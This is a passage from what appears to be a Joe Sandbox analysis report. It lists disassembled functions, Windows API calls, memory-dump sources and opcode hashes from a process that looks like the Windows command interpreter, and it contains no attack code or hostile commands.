                                        • Control-flow graph: function at 7ff7cd498d80 (nodes 1171-1206); API calls on the graph: Sleep, _amsg_exit, _initterm, exit, _cexit
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                        • String ID:
                                        • API String ID: 4291973834-0
                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                        • Instruction ID: 1ffb054e2dd3121d3e0774b0eddbd44d01c492bf22b47cf440d3cf454bdddd57
                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                        • Instruction Fuzzy Hash: 28412A21B0CA4392FA54BF56E854635F2A6AB64364F840475DF7E836A0FF3CEA408760

                                        Control-flow Graph

                                        • Control-flow graph: function at 7ff7cd4889c0 (nodes 1207-1222); API calls on the graph: memset, GetDriveTypeW, GetVolumeInformationW, GetLastError, ??_V@YAXPEAX@Z
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                        • String ID:
                                        • API String ID: 850181435-0
                                        • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                        • Instruction ID: dbcf1004a4bf246e01c8b7cc3b56b60156aa305da354e0296cba6286dcce7357
                                        • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                        • Instruction Fuzzy Hash: E5415B32608AC1CAE7609F21E8442F9B7A5FB89B94F844125DF5D8BB48EF38D645C720

                                        Control-flow Graph

                                        • Control-flow graph: function at 7ff7cd494a14 (nodes 1224-1231); API calls on the graph: GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, memmove, FreeEnvironmentStringsW
                                        APIs
                                        • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                        • memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                        • String ID:
                                        • API String ID: 1623332820-0
                                        • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                        • Instruction ID: 9fcb93c2cd7292d546464a98fe52d482dbf1a45eb43bffc32bc547e889ee94d9
                                        • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                        • Instruction Fuzzy Hash: F4119421B19B5182DE10AF87B404039FBE5EB89FE0B899038DF5E03744EE3DE5418754
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                        • String ID:
                                        • API String ID: 1826527819-0
                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                        • Instruction ID: 9dc8317a1de584d270973856201a4efd1fc7ed60b19a5814ba1f78276d8a0196
                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                        • Instruction Fuzzy Hash: 88015221B0CA429AEA047F56A444178FE61EB5A761FC46170DE6F06355EF3C91448B20
                                        APIs
                                          • Part of subcall function 00007FF7CD491EA0: wcschr.MSVCRT(?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7CD4B0D54), ref: 00007FF7CD491EB3
                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7CD4892AC), ref: 00007FF7CD4930CA
                                        • SetErrorMode.KERNELBASE ref: 00007FF7CD4930DD
                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4930F6
                                        • SetErrorMode.KERNELBASE ref: 00007FF7CD493106
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorMode$FullNamePathwcschr
                                        • String ID:
                                        • API String ID: 1464828906-0
                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                        • Instruction ID: ac25019f9a086734ea65ca7854a2d03bef520ecf219e55c45c08863e416080cb
                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                        • Instruction Fuzzy Hash: 4531B121B0C65186E724AF56A40487EF666EB46BB0FD88135DF6A433E0FE7DEA458310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                        • API String ID: 2221118986-3416068913
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memsetwcschr
                                        • String ID: 2$COMSPEC
                                        • API String ID: 1764819092-1738800741
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                        • String ID:
                                        • API String ID: 4254246844-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                        • String ID:
                                        • API String ID: 2643372051-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$ConsoleMode
                                        • String ID:
                                        • API String ID: 1591002910-0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: DriveType
                                        • String ID: :
                                        • API String ID: 338552980-336475711
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF7CD495B52
                                          • Part of subcall function 00007FF7CD494224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD494297
                                          • Part of subcall function 00007FF7CD494224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD4942D7
                                          • Part of subcall function 00007FF7CD494224: memset.MSVCRT ref: 00007FF7CD4942FD
                                          • Part of subcall function 00007FF7CD494224: memset.MSVCRT ref: 00007FF7CD494368
                                          • Part of subcall function 00007FF7CD494224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD494380
                                          • Part of subcall function 00007FF7CD494224: wcsrchr.MSVCRT ref: 00007FF7CD4943E6
                                          • Part of subcall function 00007FF7CD494224: lstrcmpW.KERNELBASE ref: 00007FF7CD494401
                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7CD495BC7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                        • String ID:
                                        • API String ID: 497088868-0
                                        APIs
                                        • FindClose.KERNELBASE(?,?,?,00007FF7CD4AEAC5,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD493A56
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_taskmalloc
                                        • String ID:
                                        • API String ID: 1412018758-0
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: exit
                                        • String ID:
                                        • API String ID: 2483651598-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: DefaultUser
                                        • String ID:
                                        • API String ID: 3358694519-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        APIs
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7F44
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A7F5C
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7F9E
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7FFF
                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8020
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8036
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8061
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A8075
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A80D6
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A80EA
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A8177
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A819A
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81BD
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81DC
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81FB
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A821A
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A8239
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8291
                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A82D7
                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A82FB
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A831A
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8364
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A8378
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A839A
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A83AE
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A83E6
                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8403
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8418
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                        • API String ID: 3637805771-3100821235
                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                        • Instruction ID: cfbe3cc7852aa30d2df3946e539973b2af21d86a31baaf239b726bb3d2dacccd
                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                        • Instruction Fuzzy Hash: 1DE18631B0CA529AE710AF66E404179FBA1FB59BA5B849134CF2E53790FF3DA605C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                        • String ID: DPATH
                                        • API String ID: 95024817-2010427443
                                        • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                        • Instruction ID: 62e4c871c5ab285b35346810f93ffdcaa57cc52ed22cd8cd89e60beb153362e9
                                        • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                        • Instruction Fuzzy Hash: 2B128432B0C68286E764AF15A44417DF6A1FB897A4F845139EF6E57794EF3CEA00CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                        • API String ID: 1795611712-3662956551
                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                        • Instruction ID: c4ffb43a4dd708b072ce748a150b20da4085b9160fc97b799ab9da3276c8643d
                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                        • Instruction Fuzzy Hash: 60E1B022B0C64296E710BF65A8405BDE6A1BB897A4FD44136DF2E57695FF3CE604C320
                                        APIs
                                        • _wcsupr.MSVCRT ref: 00007FF7CD4AEF33
                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEF98
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFA9
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFBF
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD4AEFDC
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFED
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF003
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF022
